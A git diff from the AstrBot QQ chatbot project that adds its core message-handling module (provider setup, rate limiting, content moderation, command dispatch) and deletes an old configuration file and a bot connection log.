print("[RevChatGPT] 请求出现了一些问题, 正在重试。次数"+str(err_count))
|
||||
err_count += 1
|
||||
if err_count == retry_count:
|
||||
raise e
|
||||
|
||||
print("[RevChatGPT] "+str(resp))
|
||||
return resp
|
||||
491
astrbot/core.py
Normal file
@@ -0,0 +1,491 @@
|
||||
import re
|
||||
import threading
|
||||
import asyncio
|
||||
import time
|
||||
import util.unfit_words as uw
|
||||
import os
|
||||
import sys
|
||||
import traceback
|
||||
|
||||
import util.agent.web_searcher as web_searcher
|
||||
import util.plugin_util as putil
|
||||
|
||||
from nakuru.entities.components import Plain, At, Image
|
||||
|
||||
from addons.baidu_aip_judge import BaiduJudge
|
||||
from model.provider.provider import Provider
|
||||
from model.command.command import Command
|
||||
from util import general_utils as gu
|
||||
from util.general_utils import upload, run_monitor
|
||||
from util.cmd_config import CmdConfig as cc
|
||||
from util.cmd_config import init_astrbot_config_items
|
||||
from type.types import GlobalObject
|
||||
from type.register import *
|
||||
from type.message import AstrBotMessage
|
||||
from addons.dashboard.helper import DashBoardHelper
|
||||
from addons.dashboard.server import DashBoardData
|
||||
from persist.session import dbConn
|
||||
from model.platform._message_result import MessageResult
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
# 用户发言频率
|
||||
user_frequency = {}
|
||||
# 时间默认值
|
||||
frequency_time = 60
|
||||
# 计数默认值
|
||||
frequency_count = 10
|
||||
|
||||
# 版本
|
||||
version = '3.1.13'
|
||||
|
||||
# 语言模型
|
||||
OPENAI_OFFICIAL = 'openai_official'
|
||||
NONE_LLM = 'none_llm'
|
||||
chosen_provider = None
|
||||
# 语言模型对象
|
||||
llm_instance: dict[str, Provider] = {}
|
||||
llm_command_instance: dict[str, Command] = {}
|
||||
llm_wake_prefix = ""
|
||||
|
||||
# 百度内容审核实例
|
||||
baidu_judge = None
|
||||
|
||||
# CLI
|
||||
PLATFORM_CLI = 'cli'
|
||||
|
||||
init_astrbot_config_items()
|
||||
|
||||
# 全局对象
|
||||
_global_object: GlobalObject = None
|
||||
|
||||
# 语言模型选择
|
||||
|
||||
|
||||
def privider_chooser(cfg):
|
||||
l = []
|
||||
if 'openai' in cfg and len(cfg['openai']['key']) > 0 and cfg['openai']['key'][0] is not None:
|
||||
l.append('openai_official')
|
||||
return l
|
||||
|
||||
|
||||
'''
|
||||
初始化机器人
|
||||
'''
|
||||
|
||||
|
||||
def init():
|
||||
global llm_instance, llm_command_instance
|
||||
global baidu_judge, chosen_provider
|
||||
global frequency_count, frequency_time
|
||||
global _global_object
|
||||
|
||||
# 迁移旧配置
|
||||
gu.try_migrate_config()
|
||||
# 使用新配置
|
||||
cfg = cc.get_all()
|
||||
|
||||
_event_loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(_event_loop)
|
||||
|
||||
# 初始化 global_object
|
||||
_global_object = GlobalObject()
|
||||
_global_object.version = version
|
||||
_global_object.base_config = cfg
|
||||
logger.info("AstrBot v"+version)
|
||||
|
||||
if 'reply_prefix' in cfg:
|
||||
# 适配旧版配置
|
||||
if isinstance(cfg['reply_prefix'], dict):
|
||||
_global_object.reply_prefix = ""
|
||||
cfg['reply_prefix'] = ""
|
||||
cc.put("reply_prefix", "")
|
||||
else:
|
||||
_global_object.reply_prefix = cfg['reply_prefix']
|
||||
|
||||
default_personality_str = cc.get("default_personality_str", "")
|
||||
if default_personality_str == "":
|
||||
_global_object.default_personality = None
|
||||
else:
|
||||
_global_object.default_personality = {
|
||||
"name": "default",
|
||||
"prompt": default_personality_str,
|
||||
}
|
||||
|
||||
# 语言模型提供商
|
||||
logger.info("正在载入语言模型...")
|
||||
prov = privider_chooser(cfg)
|
||||
if OPENAI_OFFICIAL in prov:
|
||||
logger.info("初始化:OpenAI官方")
|
||||
if cfg['openai']['key'] is not None and cfg['openai']['key'] != [None]:
|
||||
from model.provider.openai_official import ProviderOpenAIOfficial
|
||||
from model.command.openai_official import CommandOpenAIOfficial
|
||||
llm_instance[OPENAI_OFFICIAL] = ProviderOpenAIOfficial(
|
||||
cfg['openai'])
|
||||
llm_command_instance[OPENAI_OFFICIAL] = CommandOpenAIOfficial(
|
||||
llm_instance[OPENAI_OFFICIAL], _global_object)
|
||||
_global_object.llms.append(RegisteredLLM(
|
||||
llm_name=OPENAI_OFFICIAL, llm_instance=llm_instance[OPENAI_OFFICIAL], origin="internal"))
|
||||
chosen_provider = OPENAI_OFFICIAL
|
||||
|
||||
instance = llm_instance[OPENAI_OFFICIAL]
|
||||
assert isinstance(instance, ProviderOpenAIOfficial)
|
||||
instance.DEFAULT_PERSONALITY = _global_object.default_personality
|
||||
instance.curr_personality = instance.DEFAULT_PERSONALITY
|
||||
|
||||
# 检查provider设置偏好
|
||||
p = cc.get("chosen_provider", None)
|
||||
if p is not None and p in llm_instance:
|
||||
chosen_provider = p
|
||||
|
||||
# 百度内容审核
|
||||
if 'baidu_aip' in cfg and 'enable' in cfg['baidu_aip'] and cfg['baidu_aip']['enable']:
|
||||
try:
|
||||
baidu_judge = BaiduJudge(cfg['baidu_aip'])
|
||||
logger.info("百度内容审核初始化成功")
|
||||
except BaseException as e:
|
||||
logger.info("百度内容审核初始化失败")
|
||||
|
||||
threading.Thread(target=upload, args=(
|
||||
_global_object, ), daemon=True).start()
|
||||
|
||||
# 得到发言频率配置
|
||||
if 'limit' in cfg:
|
||||
if 'count' in cfg['limit']:
|
||||
frequency_count = cfg['limit']['count']
|
||||
if 'time' in cfg['limit']:
|
||||
frequency_time = cfg['limit']['time']
|
||||
|
||||
try:
|
||||
if 'uniqueSessionMode' in cfg and cfg['uniqueSessionMode']:
|
||||
_global_object.unique_session = True
|
||||
else:
|
||||
_global_object.unique_session = False
|
||||
except BaseException as e:
|
||||
logger.info("独立会话配置错误: "+str(e))
|
||||
|
||||
nick_qq = cc.get("nick_qq", None)
|
||||
if nick_qq == None:
|
||||
nick_qq = ("ai", "!", "!")
|
||||
if isinstance(nick_qq, str):
|
||||
nick_qq = (nick_qq,)
|
||||
if isinstance(nick_qq, list):
|
||||
nick_qq = tuple(nick_qq)
|
||||
_global_object.nick = nick_qq
|
||||
|
||||
# 语言模型唤醒词
|
||||
global llm_wake_prefix
|
||||
llm_wake_prefix = cc.get("llm_wake_prefix", "")
|
||||
|
||||
logger.info("正在载入插件...")
|
||||
# 加载插件
|
||||
_command = Command(None, _global_object)
|
||||
ok, err = putil.plugin_reload(_global_object.cached_plugins)
|
||||
if ok:
|
||||
logger.info(
|
||||
f"成功载入 {len(_global_object.cached_plugins)} 个插件")
|
||||
else:
|
||||
logger.info(err)
|
||||
|
||||
if chosen_provider is None:
|
||||
llm_command_instance[NONE_LLM] = _command
|
||||
chosen_provider = NONE_LLM
|
||||
|
||||
logger.info("正在载入机器人消息平台")
|
||||
# logger.info("提示:需要添加管理员 ID 才能使用 update/plugin 等指令),可在可视化面板添加。(如已添加可忽略)")
|
||||
platform_str = ""
|
||||
# GOCQ
|
||||
if 'gocqbot' in cfg and cfg['gocqbot']['enable']:
|
||||
logger.info("启用 QQ_GOCQ 机器人消息平台")
|
||||
threading.Thread(target=run_gocq_bot, args=(
|
||||
cfg, _global_object), daemon=True).start()
|
||||
platform_str += "QQ_GOCQ,"
|
||||
|
||||
# QQ频道
|
||||
if 'qqbot' in cfg and cfg['qqbot']['enable'] and cfg['qqbot']['appid'] != None:
|
||||
logger.info("启用 QQ_OFFICIAL 机器人消息平台")
|
||||
threading.Thread(target=run_qqchan_bot, args=(
|
||||
cfg, _global_object), daemon=True).start()
|
||||
platform_str += "QQ_OFFICIAL,"
|
||||
|
||||
# 初始化dashboard
|
||||
_global_object.dashboard_data = DashBoardData(
|
||||
stats={},
|
||||
configs={},
|
||||
logs={},
|
||||
plugins=_global_object.cached_plugins,
|
||||
)
|
||||
dashboard_helper = DashBoardHelper(_global_object, config=cc.get_all())
|
||||
dashboard_thread = threading.Thread(
|
||||
target=dashboard_helper.run, daemon=True)
|
||||
dashboard_thread.start()
|
||||
|
||||
# 运行 monitor
|
||||
threading.Thread(target=run_monitor, args=(
|
||||
_global_object,), daemon=True).start()
|
||||
|
||||
logger.info(
|
||||
"如果有任何问题, 请在 https://github.com/Soulter/AstrBot 上提交 issue 或加群 322154837。")
|
||||
logger.info("请给 https://github.com/Soulter/AstrBot 点个 star。")
|
||||
if platform_str == '':
|
||||
platform_str = "(未启动任何平台,请前往面板添加)"
|
||||
logger.info(f"🎉 项目启动完成")
|
||||
|
||||
dashboard_thread.join()
|
||||
|
||||
|
||||
'''
|
||||
运行 QQ_OFFICIAL 机器人
|
||||
'''
|
||||
|
||||
|
||||
def run_qqchan_bot(cfg: dict, global_object: GlobalObject):
|
||||
try:
|
||||
from model.platform.qq_official import QQOfficial
|
||||
qqchannel_bot = QQOfficial(
|
||||
cfg=cfg, message_handler=oper_msg, global_object=global_object)
|
||||
global_object.platforms.append(RegisteredPlatform(
|
||||
platform_name="qqchan", platform_instance=qqchannel_bot, origin="internal"))
|
||||
qqchannel_bot.run()
|
||||
except BaseException as e:
|
||||
logger.error("启动 QQ 频道机器人时出现错误, 原因如下: " + str(e))
|
||||
logger.error(r"如果您是初次启动,请前往可视化面板填写配置。详情请看:https://astrbot.soulter.top/center/。")
|
||||
|
||||
|
||||
'''
|
||||
运行 QQ_GOCQ 机器人
|
||||
'''
|
||||
|
||||
|
||||
def run_gocq_bot(cfg: dict, _global_object: GlobalObject):
|
||||
from model.platform.qq_gocq import QQGOCQ
|
||||
|
||||
noticed = False
|
||||
host = cc.get("gocq_host", "127.0.0.1")
|
||||
port = cc.get("gocq_websocket_port", 6700)
|
||||
http_port = cc.get("gocq_http_port", 5700)
|
||||
logger.info(
|
||||
f"正在检查连接...host: {host}, ws port: {port}, http port: {http_port}")
|
||||
while True:
|
||||
if not gu.port_checker(port=port, host=host) or not gu.port_checker(port=http_port, host=host):
|
||||
if not noticed:
|
||||
noticed = True
|
||||
logger.warning(
|
||||
f"连接到{host}:{port}(或{http_port})失败。程序会每隔 5s 自动重试。")
|
||||
time.sleep(5)
|
||||
else:
|
||||
logger.info("已连接到 gocq。")
|
||||
break
|
||||
try:
|
||||
qq_gocq = QQGOCQ(cfg=cfg, message_handler=oper_msg,
|
||||
global_object=_global_object)
|
||||
_global_object.platforms.append(RegisteredPlatform(
|
||||
platform_name="gocq", platform_instance=qq_gocq, origin="internal"))
|
||||
qq_gocq.run()
|
||||
except BaseException as e:
|
||||
input("启动QQ机器人出现错误"+str(e))
|
||||
|
||||
|
||||
'''
|
||||
检查发言频率
|
||||
'''
|
||||
|
||||
|
||||
def check_frequency(id) -> bool:
|
||||
ts = int(time.time())
|
||||
if id in user_frequency:
|
||||
if ts-user_frequency[id]['time'] > frequency_time:
|
||||
user_frequency[id]['time'] = ts
|
||||
user_frequency[id]['count'] = 1
|
||||
return True
|
||||
else:
|
||||
if user_frequency[id]['count'] >= frequency_count:
|
||||
return False
|
||||
else:
|
||||
user_frequency[id]['count'] += 1
|
||||
return True
|
||||
else:
|
||||
t = {'time': ts, 'count': 1}
|
||||
user_frequency[id] = t
|
||||
return True
|
||||
|
||||
|
||||
async def record_message(platform: str, session_id: str):
|
||||
# TODO: 这里会非常吃资源。然而 sqlite3 不支持多线程,所以暂时这样写。
|
||||
curr_ts = int(time.time())
|
||||
db_inst = dbConn()
|
||||
db_inst.increment_stat_session(platform, session_id, 1)
|
||||
db_inst.increment_stat_message(curr_ts, 1)
|
||||
db_inst.increment_stat_platform(curr_ts, platform, 1)
|
||||
_global_object.cnt_total += 1
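# Editor's sketch (an assumption, not the project's code): one common way to address the
# TODO above — sqlite3 connections being single-threaded and the per-message writes being
# expensive — is to funnel all writes through one dedicated writer thread, so only that
# thread ever touches the connection. The database path below is a placeholder.
#
#   import queue, sqlite3, threading
#
#   write_queue = queue.Queue()  # items are (sql, params) tuples
#
#   def _writer_loop():
#       conn = sqlite3.connect("data.db")  # connection owned by this thread only
#       while True:
#           sql, params = write_queue.get()
#           conn.execute(sql, params)
#           conn.commit()
#
#   threading.Thread(target=_writer_loop, daemon=True).start()
#   # producers (e.g. record_message) would just enqueue:
#   # write_queue.put(("INSERT INTO ...", (platform, session_id)))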
|
||||
|
||||
|
||||
async def oper_msg(message: AstrBotMessage,
|
||||
session_id: str,
|
||||
role: str = 'member',
|
||||
platform: str = None,
|
||||
) -> MessageResult:
|
||||
"""
|
||||
处理消息。
|
||||
message: 消息对象
|
||||
session_id: 该消息源的唯一识别号
|
||||
role: member | admin
|
||||
platform: str 所注册的平台的名称。如果没有注册,将抛出一个异常。
|
||||
"""
|
||||
global chosen_provider, _global_object
|
||||
message_str = ''
|
||||
session_id = session_id
|
||||
role = role
|
||||
hit = False # 是否命中指令
|
||||
command_result = () # 调用指令返回的结果
|
||||
|
||||
# 获取平台实例
|
||||
reg_platform: RegisteredPlatform = None
|
||||
for p in _global_object.platforms:
|
||||
if p.platform_name == platform:
|
||||
reg_platform = p
|
||||
break
|
||||
if not reg_platform:
|
||||
raise Exception(f"未找到平台 {platform} 的实例。")
|
||||
|
||||
# 统计数据,如频道消息量
|
||||
await record_message(platform, session_id)
|
||||
|
||||
for i in message.message:
|
||||
if isinstance(i, Plain):
|
||||
message_str += i.text.strip()
|
||||
if message_str == "":
|
||||
return MessageResult("Hi~")
|
||||
|
||||
# 检查发言频率
|
||||
if not check_frequency(message.sender.user_id):
|
||||
return MessageResult(f'你的发言超过频率限制(╯▔皿▔)╯。\n管理员设置{frequency_time}秒内只能提问{frequency_count}次。')
|
||||
|
||||
# 检查是否是更换语言模型的请求
|
||||
temp_switch = ""
|
||||
if message_str.startswith('/gpt'):
|
||||
target = chosen_provider
|
||||
if message_str.startswith('/gpt'):
|
||||
target = OPENAI_OFFICIAL
|
||||
l = message_str.split(' ')
|
||||
if len(l) > 1 and l[1] != "":
|
||||
# 临时对话模式,先记录下之前的语言模型,回答完毕后再切回
|
||||
temp_switch = chosen_provider
|
||||
chosen_provider = target
|
||||
message_str = l[1]
|
||||
else:
|
||||
chosen_provider = target
|
||||
cc.put("chosen_provider", chosen_provider)
|
||||
return MessageResult(f"已切换至【{chosen_provider}】")
|
||||
|
||||
llm_result_str = ""
|
||||
|
||||
# check commands and plugins
|
||||
message_str_no_wake_prefix = message_str
|
||||
for wake_prefix in _global_object.nick: # nick: tuple
|
||||
if message_str.startswith(wake_prefix):
|
||||
message_str_no_wake_prefix = message_str.removeprefix(wake_prefix)
|
||||
break
|
||||
hit, command_result = await llm_command_instance[chosen_provider].check_command(
|
||||
message_str_no_wake_prefix,
|
||||
session_id,
|
||||
role,
|
||||
reg_platform,
|
||||
message,
|
||||
)
|
||||
|
||||
# 没触发指令
|
||||
if not hit:
|
||||
# 关键词拦截
|
||||
for i in uw.unfit_words_q:
|
||||
matches = re.match(i, message_str.strip(), re.I | re.M)
|
||||
if matches:
|
||||
return MessageResult(f"你的提问得到的回复未通过【默认关键词拦截】服务, 不予回复。")
|
||||
if baidu_judge != None:
|
||||
check, msg = await asyncio.to_thread(baidu_judge.judge, message_str)
|
||||
if not check:
|
||||
return MessageResult(f"你的提问得到的回复未通过【百度AI内容审核】服务, 不予回复。\n\n{msg}")
|
||||
if chosen_provider == NONE_LLM:
|
||||
logger.info("一条消息由于 Bot 未启动任何语言模型并且未触发指令而将被忽略。")
|
||||
return
|
||||
try:
|
||||
if llm_wake_prefix != "" and not message_str.startswith(llm_wake_prefix):
|
||||
return
|
||||
# check image url
|
||||
image_url = None
|
||||
for comp in message.message:
|
||||
if isinstance(comp, Image):
|
||||
if comp.url is None:
|
||||
image_url = comp.file
|
||||
break
|
||||
else:
|
||||
image_url = comp.url
|
||||
break
|
||||
# web search keyword
|
||||
web_sch_flag = False
|
||||
if message_str.startswith("ws ") and message_str != "ws ":
|
||||
message_str = message_str[3:]
|
||||
web_sch_flag = True
|
||||
else:
|
||||
message_str += " " + cc.get("llm_env_prompt", "")
|
||||
if chosen_provider == OPENAI_OFFICIAL:
|
||||
if _global_object.web_search or web_sch_flag:
|
||||
official_fc = chosen_provider == OPENAI_OFFICIAL
|
||||
llm_result_str = await web_searcher.web_search(message_str, llm_instance[chosen_provider], session_id, official_fc)
|
||||
else:
|
||||
llm_result_str = await llm_instance[chosen_provider].text_chat(message_str, session_id, image_url)
|
||||
|
||||
llm_result_str = _global_object.reply_prefix + llm_result_str
|
||||
except BaseException as e:
|
||||
logger.error(f"调用异常:{traceback.format_exc()}")
|
||||
return MessageResult(f"调用异常。详细原因:{str(e)}")
|
||||
|
||||
# 切换回原来的语言模型
|
||||
if temp_switch != "":
|
||||
chosen_provider = temp_switch
|
||||
|
||||
if hit:
|
||||
# 有指令或者插件触发
|
||||
# command_result 是一个元组:(指令调用是否成功, 指令返回的文本结果, 指令类型)
|
||||
if command_result == None:
|
||||
return
|
||||
command = command_result[2]
|
||||
|
||||
if command == "update latest r":
|
||||
def update_restart():
|
||||
py = sys.executable
|
||||
os.execl(py, py, *sys.argv)
|
||||
return MessageResult(command_result[1] + "\n\n即将自动重启。", callback=update_restart)
|
||||
|
||||
if not command_result[0]:
|
||||
return MessageResult(f"指令调用错误: \n{str(command_result[1])}")
|
||||
|
||||
# 画图指令
|
||||
if command == 'draw':
|
||||
# 保存到本地
|
||||
path = await gu.download_image_by_url(command_result[1])
|
||||
return MessageResult([Image.fromFileSystem(path)])
|
||||
# 其他指令
|
||||
else:
|
||||
try:
|
||||
return MessageResult(command_result[1])
|
||||
except BaseException as e:
|
||||
return MessageResult(f"回复消息出错: {str(e)}")
|
||||
return
|
||||
|
||||
# 敏感过滤
|
||||
# 过滤不合适的词
|
||||
for i in uw.unfit_words:
|
||||
llm_result_str = re.sub(i, "***", llm_result_str)
|
||||
# 百度内容审核服务二次审核
|
||||
if baidu_judge != None:
|
||||
check, msg = await asyncio.to_thread(baidu_judge.judge, llm_result_str)
|
||||
if not check:
|
||||
return MessageResult(f"你的提问得到的回复【百度内容审核】未通过,不予回复。\n\n{msg}")
|
||||
# 发送信息
|
||||
try:
|
||||
return MessageResult(llm_result_str)
|
||||
except BaseException as e:
|
||||
logger.info("回复消息错误: \n"+str(e))
|
||||
@@ -1,42 +0,0 @@
|
||||
openai:
|
||||
# 注意:在1.7版本已支持多key自动切换,方法:
|
||||
# key:
|
||||
# - xxxxx
|
||||
# - xxxxxx
|
||||
# 在下方非注释的地方使用以上格式
|
||||
key:
|
||||
-
|
||||
|
||||
chatGPTConfigs:
|
||||
engine: "gpt-3.5-turbo"
|
||||
max_tokens: 1000
|
||||
temperature: 0.9
|
||||
top_p: 1
|
||||
frequency_penalty: 0
|
||||
presence_penalty: 0
|
||||
|
||||
total_tokens_limit: 2000
|
||||
qqbot:
|
||||
appid:
|
||||
token:
|
||||
|
||||
# 设置是否一个人一个会话
|
||||
uniqueSessionMode: false
|
||||
|
||||
# QChannelBot 的版本,请勿修改此字段,否则可能产生一些bug
|
||||
version: 2.4 RealChatGPT Ver.
|
||||
|
||||
# [Beta] 转储历史记录时间间隔(分钟)
|
||||
dump_history_interval: 10
|
||||
|
||||
# 一个用户只能在time秒内发送count条消息
|
||||
limit:
|
||||
time: 60
|
||||
count: 5
|
||||
# 公告
|
||||
notice: "此机器人由Github项目QQChannelChatGPT驱动。"
|
||||
|
||||
# 是否打开私信功能
|
||||
# 设置为true则频道成员可以私聊机器人。
|
||||
# 设置为false则频道成员不能私聊机器人。
|
||||
direct_message_mode: true
|
||||
323
botpy.log
@@ -1,323 +0,0 @@
|
||||
2022-12-08 14:29:09,486 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 14:29:10,173 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 14:29:10,174 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 14:29:10,175 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 14:29:10,175 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 14:29:10,335 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 14:29:10,460 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 14:29:10,461 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:17:18,117 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:17:18,355 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/users/@me, 错误代码: 401, 返回内容: {'message': 'wrong bot token', 'code': 11242}, trace_id:829d8c60d296a3edcfac3d776dbd8b47
|
||||
2022-12-08 16:18:59,759 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:19:00,266 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:19:00,267 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:19:00,268 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:19:00,268 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:19:00,412 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:19:00,522 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:19:00,522 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:20:14,446 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:20:15,035 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:20:15,036 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:20:15,037 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:20:15,037 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:20:15,232 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:20:15,320 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:20:15,321 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:42:06,957 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:42:07,468 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:42:07,469 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:42:07,469 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:42:07,470 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:42:07,672 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:42:07,862 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:42:07,863 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:45:44,758 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:45:45,439 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:45:45,440 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:45:45,441 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:45:45,441 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:45:45,751 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:45:45,858 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:45:45,859 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:47:16,567 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:47:17,008 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:47:17,009 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:47:17,009 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:47:17,010 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:47:17,187 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:47:17,284 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:47:17,285 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:48:39,358 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:48:45,366 [WARNING] (http.py:188)request 请求超时,请求连接: https://api.sgroup.qq.com/gateway/bot
|
||||
2022-12-08 16:48:53,301 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:48:53,789 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:48:53,790 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:48:53,791 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:48:53,791 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:48:53,969 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:48:54,062 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:48:54,063 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:49:26,466 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:b201dd7b37649dcf47b82d54c58bc5dd
|
||||
2022-12-08 16:51:59,155 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:51:59,728 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:51:59,729 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:51:59,730 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:51:59,730 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:51:59,887 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:52:00,022 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:52:00,023 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:52:28,760 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 403, 返回内容: {'code': 304003, 'message': 'url not allowed'}, trace_id:e62b072c9f0184f6bf7dd03a00fc0ef3
|
||||
2022-12-08 16:53:53,370 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:53:53,890 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:53:53,891 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:53:53,892 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:53:53,892 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:53:54,101 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:53:54,194 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:53:54,195 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 16:54:26,287 [ERROR] (http.py:73)_handle_response [botpy] 接口请求异常,请求连接: https://api.sgroup.qq.com/channels/7150805/messages, 错误代码: 501, 返回内容: None, trace_id:None
|
||||
2022-12-08 16:55:01,062 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
2022-12-08 16:55:01,601 [INFO] (client.py:178)_bot_init [botpy] 程序启动...
|
||||
2022-12-08 16:55:01,601 [INFO] (connection.py:59)multi_run [botpy] 最大并发连接数: 1, 启动会话数: 1
|
||||
2022-12-08 16:55:01,602 [INFO] (client.py:236)bot_connect [botpy] 会话启动中...
|
||||
2022-12-08 16:55:01,603 [INFO] (gateway.py:110)ws_connect [botpy] 启动中...
|
||||
2022-12-08 16:55:01,742 [INFO] (gateway.py:136)ws_identify [botpy] 鉴权中...
|
||||
2022-12-08 16:55:01,816 [INFO] (gateway.py:80)on_message [botpy] 机器人「SoGPT-测试中」启动成功!
|
||||
2022-12-08 16:55:01,817 [INFO] (gateway.py:217)_send_heart [botpy] 心跳维持启动...
|
||||
2022-12-08 17:00:29,939 [INFO] (client.py:159)_bot_login [botpy] 登录机器人账号中...
|
||||
